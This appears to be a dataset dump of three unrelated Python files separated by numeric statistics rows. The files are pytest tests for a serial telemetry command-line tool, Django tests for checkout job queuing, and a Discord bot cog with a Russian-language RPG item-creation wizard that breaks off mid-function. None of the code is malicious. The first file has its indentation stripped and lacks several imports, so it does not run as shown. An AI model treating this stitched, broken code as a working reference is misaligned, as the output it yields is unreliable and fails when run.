import sys
import queue
class TransportMock:
def __init__(self):
self.q = queue.Queue()
self.canConnect = False
self.counter = 0
def authorizeConnect(self,value):
self.canConnect = value
def connect(self,options):
print("TransportMock trying to connect")
if not self.canConnect:
raise IOError("TransportMock denied connection")
print("TransportMock connected")
def disconnect(self):
pass
def read(self, maxbytes=1):
amount = maxbytes if self.q.qsize() > maxbytes else self.q.qsize()
self.counter += amount
data = []
for i in range(amount):
data.append(self.q.get())
return data
def readable(self):
return self.q.qsize()
def write(self, data):
for c in data:
self.q.put(c)
def writeable(self):
return True
def resetStats(self,averaging_window=1):
self.counter = 0
def stats(self):
return {
"rx_bytes": self.counter,
"tx_bytes" : 0,
"rx_chunks" : 0,
"tx_chunks" : 0,
"rx_in_waiting" : 0,
"rx_in_waiting_avg" : 0,
"rx_in_waiting_max" : 0
}
def clear(stream):
stream.truncate(0)
stream.seek(0)
def test_pub_ls():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.onecmd("ls")
tlm.runner.update()
assert outstream.getvalue() == ""
clear(outstream)
tlm.onecmd("pub --f32 topicA 0.4")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'topicA' : 0.4 [float32]\n"
clear(outstream)
tlm.onecmd("ls")
tlm.runner.update()
assert outstream.getvalue() == "topicA\n"
clear(outstream)
tlm.onecmd("pub --f32 topicB 0.4")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'topicB' : 0.4 [float32]\n"
clear(outstream)
tlm.onecmd("ls")
tlm.runner.update()
assert outstream.getvalue() == "topicA\ntopicB\n"
clear(outstream)
tlm.onecmd("pub --i16 topicC 0.0") # Casting from float to int generates negligeable error. Publish will succeed
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'topicC' : 0 [int16]\n"
clear(outstream)
tlm.onecmd("pub --i16 topicC 0.1") # Casting from float to int generates non-negligeable error. Publish will fail
tlm.runner.update()
assert outstream.getvalue() == "Aborted : Wrote decimal number (0.1) with integer flag.\n"
clear(outstream)
def test_connect_fail():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.onecmd("serial com123")
tlm.runner.update()
assert outstream.getvalue() == "Failed to connect to com123 at 9600 (bauds).\n"
clear(outstream)
tlm.onecmd("serial com123 -b 115200")
tlm.runner.update()
assert outstream.getvalue() == "Failed to connect to com123 at 115200 (bauds).\n"
clear(outstream)
tlm.onecmd("serial com123 --bauds 57600")
tlm.runner.update()
assert outstream.getvalue() == "Failed to connect to com123 at 57600 (bauds).\n"
clear(outstream)
def test_print():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.onecmd("pub --i32 foo 2")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'foo' : 2 [int32]\n"
clear(outstream)
tlm.onecmd("pub --i32 foo 3")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'foo' : 3 [int32]\n"
clear(outstream)
tlm.onecmd("pub --s hello world")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'hello' : world [string]\n"
clear(outstream)
tlm.onecmd("pub --i32 foo 4")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'foo' : 4 [int32]\n"
clear(outstream)
tlm.onecmd("print foo")
tlm.runner.update()
assert outstream.getvalue() == "4\n"
clear(outstream)
tlm.onecmd("print foo -l 3")
tlm.runner.update()
assert outstream.getvalue() == "2\n3\n4\n"
clear(outstream)
tlm.onecmd("print foo -l 2")
tlm.runner.update()
assert outstream.getvalue() == "3\n4\n"
clear(outstream)
tlm.onecmd("print foo --limit 3")
tlm.runner.update()
assert outstream.getvalue() == "2\n3\n4\n"
clear(outstream)
tlm.onecmd("print foo --limit 10")
tlm.runner.update()
assert outstream.getvalue() == "2\n3\n4\n"
clear(outstream)
tlm.onecmd("print foo -a")
tlm.runner.update()
assert outstream.getvalue() == "2\n3\n4\n"
clear(outstream)
tlm.onecmd("print qux")
tlm.runner.update()
assert outstream.getvalue() == "Topic 'qux' unknown. Type 'ls' to list all available topics.\n"
clear(outstream)
tlm.onecmd("print hello")
tlm.runner.update()
assert outstream.getvalue() == "world\n"
clear(outstream)
tlm.onecmd("print foo -l 2.3")
tlm.runner.update()
assert outstream.getvalue() == "Could not cast --limit = '2.3' to integer. Using 1.\n4\n"
clear(outstream)
def test_count():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == ""
clear(outstream)
tlm.onecmd("pub --i32 foo 2")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'foo' : 2 [int32]\n"
clear(outstream)
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == "foo : 1\n"
clear(outstream)
tlm.onecmd("pub --i32 foo 3")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'foo' : 3 [int32]\n"
clear(outstream)
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == "foo : 2\n"
clear(outstream)
tlm.onecmd("pub --f32 bar 4.2")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'bar' : 4.2 [float32]\n"
clear(outstream)
tlm.onecmd("count")
tlm.runner.update()
print(outstream.getvalue())
for i in tlm.topics.topic_list.items():
print(i)
assert outstream.getvalue() == "bar : 1\nfoo : 2\n"
clear(outstream)
def test_disconnect_quit():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.onecmd("disconnect")
assert outstream.getvalue() == "Disconnected.\n"
clear(outstream)
pytest.raises(SystemExit, tlm.onecmd, "quit")
assert outstream.getvalue() == "Disconnected.\nGood Bye!\n"
clear(outstream)
def test_wrong_command():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
# Just check it doesn't raise
tlm.onecmd("pub foo --i32 123")
clear(outstream)
def test_info():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
# Just check it doesn't raise
tlm.onecmd("info")
clear(outstream)
# issue here
def test_topics_are_cleared_after_reconnect():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.runner._start_thread = MagicMock() # Mock _start_thread to avoid starting thread
tr.authorizeConnect(True)
tlm.onecmd("serial com123")
tlm.runner.update()
assert outstream.getvalue() == "Connected to com123 at 9600 (bauds).\n"
clear(outstream)
tlm.onecmd("pub --f32 bar 4.2")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'bar' : 4.2 [float32]\n"
clear(outstream)
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == "bar : 1\n"
clear(outstream)
tlm.onecmd("disconnect")
assert outstream.getvalue() == "Disconnected.\n"
clear(outstream)
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == "bar : 1\n"
clear(outstream)
tlm.onecmd("ls")
tlm.runner.update()
assert outstream.getvalue() == "bar\n"
clear(outstream)
tlm.onecmd("serial com123")
tlm.runner.update()
assert outstream.getvalue() == "Connected to com123 at 9600 (bauds).\n"
clear(outstream)
# After the re-connection all previous topics should be cleared
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == ""
clear(outstream)
tlm.onecmd("ls")
tlm.runner.update()
assert outstream.getvalue() == ""
clear(outstream)
# Here too
def test_stats():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.runner._start_thread = MagicMock() # Mock _start_thread to avoid starting thread
tr.resetStats()
tlm.runner.resetStats()
tlm.telemetry.resetStats()
tlm.onecmd("stats")
assert "Raw IO:\n" in outstream.getvalue()
assert "\trx_bytes : 0\n" in outstream.getvalue()
assert "IO speeds:\n" in outstream.getvalue()
assert "\tbaudspeed : 0.0\n" in outstream.getvalue()
assert "\tbaudratio : 0.0\n" in outstream.getvalue()
assert "\tbaudratio_avg : 0.0\n" in outstream.getvalue()
assert "\tbaudspeed_avg : 0.0\n" in outstream.getvalue()
assert "Framing:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 0\n" in outstream.getvalue()
assert "\trx_uncomplete_frames : 0\n" in outstream.getvalue()
assert "\ttx_processed_bytes : 0\n" in outstream.getvalue()
assert "\trx_complete_frames : 0\n" in outstream.getvalue()
assert "\ttx_escaped_bytes : 0\n" in outstream.getvalue()
assert "\trx_discarded_bytes : 0\n" in outstream.getvalue()
assert "\trx_processed_bytes : 0\n" in outstream.getvalue()
assert "\trx_escaped_bytes : 0\n" in outstream.getvalue()
assert "Protocol:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 0\n" in outstream.getvalue()
assert "\trx_corrupted_header : 0\n" in outstream.getvalue()
assert "\trx_decoded_frames : 0\n" in outstream.getvalue()
assert "\trx_corrupted_payload : 0\n" in outstream.getvalue()
assert "\trx_corrupted_crc : 0\n" in outstream.getvalue()
assert "\trx_corrupted_eol : 0\n" in outstream.getvalue()
assert "\trx_corrupted_topic : 0\n" in outstream.getvalue()
tlm.onecmd("pub --i32 foo 2")
clear(outstream)
tlm.runner.update()
tlm.onecmd("stats")
speeds = tlm.runner.stats()
assert "Raw IO:\n" in outstream.getvalue()
assert "\trx_bytes : 14\n" in outstream.getvalue()
assert "IO speeds:\n" in outstream.getvalue()
assert "\tbaudspeed : {0}\n".format(speeds['baudspeed']) in outstream.getvalue()
assert "\tbaudratio : {0}\n".format(speeds['baudratio']) in outstream.getvalue()
assert "\tbaudratio_avg : {0}\n".format(speeds['baudratio_avg']) in outstream.getvalue()
assert "\tbaudspeed_avg : {0}\n".format(speeds['baudspeed_avg']) in outstream.getvalue()
assert "Framing:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 1\n" in outstream.getvalue()
assert "\trx_uncomplete_frames : 0\n" in outstream.getvalue()
assert "\ttx_processed_bytes : 12\n" in outstream.getvalue()
assert "\trx_complete_frames : 1\n" in outstream.getvalue()
assert "\ttx_escaped_bytes : 0\n" in outstream.getvalue()
assert "\trx_discarded_bytes : 0\n" in outstream.getvalue()
assert "\trx_processed_bytes : 14\n" in outstream.getvalue()
assert "\trx_escaped_bytes : 0\n" in outstream.getvalue()
assert "Protocol:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 1\n" in outstream.getvalue()
assert "\trx_corrupted_header : 0\n" in outstream.getvalue()
assert "\trx_decoded_frames : 1\n" in outstream.getvalue()
assert "\trx_corrupted_payload : 0\n" in outstream.getvalue()
assert "\trx_corrupted_crc : 0\n" in outstream.getvalue()
assert "\trx_corrupted_eol : 0\n" in outstream.getvalue()
assert "\trx_corrupted_topic : 0\n" in outstream.getvalue()
# Check stats are cleaned after restart
tr.authorizeConnect(True)
tlm.onecmd("serial com123")
clear(outstream)
tlm.onecmd("stats")
assert "Raw IO:\n" in outstream.getvalue()
assert "\trx_bytes : 0\n" in outstream.getvalue()
assert "IO speeds:\n" in outstream.getvalue()
assert "\tbaudspeed : 0.0\n" in outstream.getvalue()
assert "\tbaudratio : 0.0\n" in outstream.getvalue()
assert "\tbaudratio_avg : 0.0\n" in outstream.getvalue()
assert "\tbaudspeed_avg : 0.0\n" in outstream.getvalue()
assert "Framing:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 0\n" in outstream.getvalue()
assert "\trx_uncomplete_frames : 0\n" in outstream.getvalue()
assert "\ttx_processed_bytes : 0\n" in outstream.getvalue()
assert "\trx_complete_frames : 0\n" in outstream.getvalue()
assert "\ttx_escaped_bytes : 0\n" in outstream.getvalue()
assert "\trx_discarded_bytes : 0\n" in outstream.getvalue()
assert "\trx_processed_bytes : 0\n" in outstream.getvalue()
assert "\trx_escaped_bytes : 0\n" in outstream.getvalue()
assert "Protocol:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 0\n" in outstream.getvalue()
assert "\trx_corrupted_header : 0\n" in outstream.getvalue()
assert "\trx_decoded_frames : 0\n" in outstream.getvalue()
assert "\trx_corrupted_payload : 0\n" in outstream.getvalue()
assert "\trx_corrupted_crc : 0\n" in outstream.getvalue()
assert "\trx_corrupted_eol : 0\n" in outstream.getvalue()
assert "\trx_corrupted_topic : 0\n" in outstream.getvalue()
| 30.351528
| 117
| 0.660096
| 1,801
| 13,901
| 5.014992
| 0.120489
| 0.21457
| 0.151461
| 0.190988
| 0.812888
| 0.787312
| 0.753543
| 0.72066
| 0.702724
| 0.673605
| 0
| 0.023863
| 0.201137
| 13,901
| 457
| 118
| 30.417943
| 0.789464
| 0.029998
| 0
| 0.666667
| 0
| 0
| 0.250724
| 0.014473
| 0
| 0
| 0
| 0
| 0.330409
| 1
| 0.05848
| false
| 0.002924
| 0.020468
| 0.008772
| 0.093567
| 0.040936
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
46180acdbc7ef2eb147e6a886c081c2216cb0986
| 5,129
|
py
|
Python
|
jobs/tests/test_checkout_run_task.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | 3
|
2020-05-05T12:12:09.000Z
|
2020-05-08T08:48:16.000Z
|
jobs/tests/test_checkout_run_task.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | 160
|
2020-05-19T13:03:43.000Z
|
2022-03-12T00:35:28.000Z
|
jobs/tests/test_checkout_run_task.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | null | null | null |
import datetime
import time
from unittest import mock
import pytest
from django.utils import timezone
from model_bakery import baker
from carts.models import Cart, CartItem
from orders.models import OrderItem
pytestmark = pytest.mark.django_db
def test_run_job_task_feature_disabled(
buyer,
client_buyer,
products,
delivery_address,
delivery_options,
send_task,
logistics_user,
platform_user,
settings,
):
settings.FEATURES = {"routes": False}
products[0].third_party_delivery = True
products[0].save()
products[1].third_party_delivery = True
products[1].save()
cart = baker.make(
Cart,
user=buyer,
delivery_address=delivery_address,
earliest_delivery_date=(
datetime.datetime.now() + datetime.timedelta(days=2)
).date(),
)
baker.make(
CartItem,
product=products[0],
cart=cart,
quantity=1,
delivery_option=delivery_options[0],
)
baker.make(
CartItem,
product=products[1],
cart=cart,
quantity=2,
delivery_option=delivery_options[0],
)
assert not OrderItem.objects.first()
response = client_buyer.post("/checkout")
assert response.status_code == 200
assert not [task for task in send_task.call_args_list if "jobs" in task[0][0]]
def test_job_task_third_party_delivery(
buyer,
client_buyer,
products,
delivery_address,
delivery_options,
send_task,
logistics_user,
platform_user,
settings,
traidoo_region,
):
settings.FEATURES = {"routes": True}
products[0].third_party_delivery = False
products[0].save()
products[1].third_party_delivery = True
products[1].save()
cart = baker.make(
Cart,
user=buyer,
delivery_address=delivery_address,
earliest_delivery_date=(
datetime.datetime.now() + datetime.timedelta(days=2)
).date(),
)
baker.make(
CartItem,
product=products[0],
cart=cart,
quantity=1,
delivery_option=delivery_options[1],
)
baker.make(
CartItem,
product=products[1],
cart=cart,
quantity=2,
delivery_option=delivery_options[1],
)
assert not OrderItem.objects.first()
response = client_buyer.post("/checkout")
assert response.status_code == 200
assert OrderItem.objects.count() == 2
order_item_1 = OrderItem.objects.filter(product__third_party_delivery=True).first()
order_item_2 = OrderItem.objects.filter(product__third_party_delivery=False).first()
assert order_item_1.id != order_item_2.id
assert (
mock.call(
f"/jobs/create/{order_item_1.id}",
http_method="POST",
queue_name="routes",
schedule_time=30,
headers={"Region": traidoo_region.slug},
)
in send_task.call_args_list
)
assert (
mock.call(
f"/jobs/create/{order_item_2.id}",
http_method="POST",
queue_name="routes",
schedule_time=30,
headers={"Region": traidoo_region.slug},
)
not in send_task.call_args_list
)
def test_job_task_seller_delivery(
buyer,
client_buyer,
products,
delivery_address,
delivery_options,
send_task,
logistics_user,
platform_user,
settings,
traidoo_region,
):
settings.FEATURES = {"routes": True}
products[0].third_party_delivery = True
products[0].save()
products[1].third_party_delivery = True
products[1].save()
cart = baker.make(
Cart,
user=buyer,
delivery_address=delivery_address,
earliest_delivery_date=(
datetime.datetime.now() + datetime.timedelta(days=2)
).date(),
)
baker.make(
CartItem,
product=products[0],
cart=cart,
quantity=1,
delivery_option=delivery_options[0],
)
baker.make(
CartItem,
product=products[1],
cart=cart,
quantity=2,
delivery_option=delivery_options[1],
)
assert not OrderItem.objects.first()
response = client_buyer.post("/checkout")
assert response.status_code == 200
assert OrderItem.objects.count() == 2
order_item_1 = OrderItem.objects.filter(delivery_option=delivery_options[1]).first()
order_item_2 = OrderItem.objects.filter(delivery_option=delivery_options[0]).first()
assert order_item_1.id != order_item_2.id
assert (
mock.call(
f"/jobs/create/{order_item_1.id}",
http_method="POST",
queue_name="routes",
schedule_time=30,
headers={"Region": traidoo_region.slug},
)
in send_task.call_args_list
)
assert (
mock.call(
f"/jobs/create/{order_item_2.id}",
http_method="POST",
queue_name="routes",
schedule_time=30,
headers={"Region": traidoo_region.slug},
)
not in send_task.call_args_list
)
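# These tests can be run selectively from the repository root, e.g. (a sketch):
#
#     pytest jobs/tests/test_checkout_run_task.py -k "third_party_delivery"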
| 24.079812
| 88
| 0.619419
| 584
| 5,129
| 5.191781
| 0.160959
| 0.03562
| 0.05343
| 0.076517
| 0.884565
| 0.883245
| 0.875989
| 0.815963
| 0.815963
| 0.815963
| 0
| 0.018324
| 0.276467
| 5,129
| 212
| 89
| 24.193396
| 0.798707
| 0
| 0
| 0.803279
| 0
| 0
| 0.045428
| 0.023396
| 0
| 0
| 0
| 0
| 0.081967
| 1
| 0.016393
| false
| 0
| 0.043716
| 0
| 0.060109
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c9ded932c859f687f63211cab9156cc45d8f208
| 114,603
|
py
|
Python
|
Cog/rpg.py
|
Rimuwu/Ranga
|
1a4d4545eaf4c86a8c53b4efe9d103fe57502963
|
[
"MIT"
] | 5
|
2021-09-10T15:43:40.000Z
|
2022-02-05T12:28:40.000Z
|
Cog/rpg.py
|
Rimuwu/Ranga
|
1a4d4545eaf4c86a8c53b4efe9d103fe57502963
|
[
"MIT"
] | 5
|
2021-09-10T16:38:23.000Z
|
2022-01-22T17:08:33.000Z
|
Cog/rpg.py
|
Rimuwu/Ranga
|
1a4d4545eaf4c86a8c53b4efe9d103fe57502963
|
[
"MIT"
] | 2
|
2021-09-10T15:50:52.000Z
|
2022-01-11T18:31:43.000Z
|
import nextcord as discord
from nextcord.ext import tasks, commands
from PIL import Image, ImageFont, ImageDraw, ImageOps
import io
import sys
import random
from random import choice
import asyncio
import time
import pymongo
from fuzzywuzzy import fuzz
import pprint as pprint
sys.path.append("..")
from functions import functions as funs
import config
client = funs.mongo_c()
db = client.bot
backs = db.bs
servers = db.servers
class rpg(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(usage = '-', description = 'Item creation.')
async def create_item(self, ctx):
if funs.roles_check(ctx.author, ctx.guild.id) == False:
await ctx.send("У вас недостаточно прав для использования этой команды!")
return
async def name_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if len(message.content) > 150:
await ctx.send("Название больше 150-ти символов")
return False
else:
return msg.content
async def act_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
try:
return int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return False
async def image_f(message, ctx):
try:
text = "Требуется указать __ссылку__ на изображение или `none`"
emb = discord.Embed(title = "Изображение:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if msg.content != 'none':
try:
emb1 = discord.Embed(title = "Изображение", color=server['embed_color'])
emb1.set_thumbnail(url = msg.content)
msg2 = await ctx.send(embed = emb1)
image = msg.content
except Exception:
await ctx.send("Требовалось указать __ссылку__, повторите настройку ещё раз.")
return False
if msg.content == 'none':
image = None
try:
await msg1.delete()
await msg2.delete()
except Exception:
pass
return image
async def quality_f(message, ctx):
try:
text = "**Качество предмета влияет на процент его выпадения и крафта**\n`n` - <:normal_q:781531816993620001>(normal) обычное качество, шанс выпадения/крафта 100%\n`u` - <:unusual_q:781531868780691476>(unusual) необычное качество, шанс выпадения/крафта 75%\n`r` - <:rare_q:781531919140651048>(rare) редкое качесвто, шанс выпадения/крафта 50%\n`o` - <:orate_q:781531996866084874>(orate) оратное качество, шанс выпадения/крафта 25%\n`l` - <:legendary_q:781532085130100737>(legendary) легендарное качество, шанс выпадения/крафта 10%"
emb = discord.Embed(title = "Качества:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg1.delete()
await msg.delete()
except Exception:
pass
if msg.content in ['n', 'normal', 'u', 'unusual', 'r', 'rare', 'o', 'orate', 'l', 'legendary']:
if msg.content in ['n', 'normal']:
quality = "n"
elif msg.content in ['u', 'unusual']:
quality = "u"
elif msg.content in ['r', 'rare']:
quality = "r"
elif msg.content in ['o', 'orate',]:
quality = "o"
elif msg.content in ['l', 'legendary',]:
quality = "l"
return quality
else:
await ctx.send("Вы указали не действительное качество предмета, выберите 1 из (n, u, r, o, l) и повторите создание снова!")
return False
async def description_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
description = str(msg.content)
if description == 'none':
return None
elif len(description) > 0 and len(description) < 501:
return msg.content
else:
await ctx.send("Требовалось указать описание (макс 500 символов) или `none`, повторите настройку ещё раз!")
return False
async def action_m_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
description = str(msg.content)
if description == 'none':
return None
elif len(description) > 0 and len(description) < 501:
return msg.content
else:
await ctx.send("Требовалось указать описание (макс 500 символов) или `none`, повторите настройку ещё раз!")
return False
async def race_u_f(message, ctx, server):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if msg.content == 'all' or msg.content == 'none':
return None
else:
races = list(server['races'].keys())
c_races = msg.content.split()
s = list(set(races) & set(c_races))
if s == []:
await ctx.send("Не найдено ни одного совпадения с созданными расами!")
return False
else:
return s
async def element_f(message, ctx):
try:
text = "`w` - <:water:888029916287885332>(water) Огонь >`х0.75`> Вода >`х1.25`> Земля\n`a` - <:air:888029789749919787>(air) Земля >`х0.75`> Воздух >`х1.25`> Огонь\n`f` - <:fire:888029761828425789>(fire) Воздух >`х0.75`> Огонь >`х1.25`> Вода\n`e` - <:earth:888029840945598534>(earth) Вода >`х0.75`> Земля >`х1.25`> Воздух\n\n<:fire:888029761828425789> >`х1.25`> <:water:888029916287885332> >`х1.25`> <:earth:888029840945598534> >`х1.25`> <:air:888029789749919787> >`х1.25`> <:fire:888029761828425789>\n\nУкажите `none` если у предмета нет стихии."
emb = discord.Embed(title = "Элементы:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg1.delete()
await msg.delete()
except Exception:
pass
if msg.content in ['fire', 'water', 'air', 'earth', 'none', 'w', 'a', 'f', 'e']:
if msg.content in ['w', 'water']:
el = "w"
elif msg.content in ['a', 'air']:
el = "a"
elif msg.content in ['f', 'fire']:
el = "f"
elif msg.content in ['e', 'earth',]:
el = "e"
elif msg.content in ['none']:
el = None
return el
else:
await ctx.send("Требовалось указать 1 из элементов! (w, a, f, e)")
return False
async def emoji_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
test_msg = await ctx.send("Тестовое сообщение\n Не удаляйте его, оно будет удалено автоматически при наличии прав у бота")
list = []
try:
await test_msg.add_reaction(msg.content)
except Exception:
await ctx.send("Требовалось указать :emoji:")
return False
try:
await test_msg.delete()
except Exception:
pass
return msg.content
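# Each *_f helper above waits up to 60 seconds for a reply from the command
# author in the same channel, deletes the reply when it can, and returns the
# parsed value (None for a `none`/`all` answer where that is allowed) or False
# when the input is invalid or the wait times out.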
server = servers.find_one({"server": ctx.guild.id})
item = {}
def embed(type = 'Не указано'):
nonlocal server
emb = discord.Embed(description = "**Создание предмета**", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
message = await ctx.send(embed = embed())
try:
await message.edit(embed = embed(f'Укажите тип предмета: '))
emb = discord.Embed(title = "Типы:",
description = "`eat` - еда, воостанавливает или отнимает у пользователя здоровье при использовании\n`point` - зелья здоровья или маны\n`case` - сундуки с случайным предметом\n`armor` - броня, при использовании устанавливает броню\n`weapon` - оружие, может быть: дальнобойного, ближнего и магического стиля.\n`pet` - питомец\n`material` - материал, его нельзя взять в руки или съесть, но если вам надо создать руду или стрелы, вам сюда.\n`recipe` - рецепт для крафта\n`role` - роль, при использовании выдаёт роль\n`prop` - не играбельный предмет, выполняющий функцию декорации", color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg1.delete()
await msg.delete()
except Exception:
pass
if msg.content in ['eat','point','case','armor','weapon','pet',"material",'recipe','role','prop']:
item.update({ 'type': msg.content})
else:
await ctx.send("Вы указали не действительный тип предмета, выберите 1 из (eat, point, case, armor, weapon, pet, material, recipe, role, prop) и повторите создание снова!")
return
type = msg.content
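# Each branch below walks the author through the fields for that item type,
# re-rendering the wizard embed after every answer and returning immediately
# when any helper reports invalid input; the collected values accumulate in `item`.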
if type == 'eat':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', element = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
emb.add_field(name = "Питательность предмета", value = f"{act}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Элемент", value = f"{element}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, f"Укажите питательность `{name}`"))
act = await act_f(message, ctx)
if act == False:
return
else:
item.update({ 'act': act})
await message.edit(embed = embed(type, name, act, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
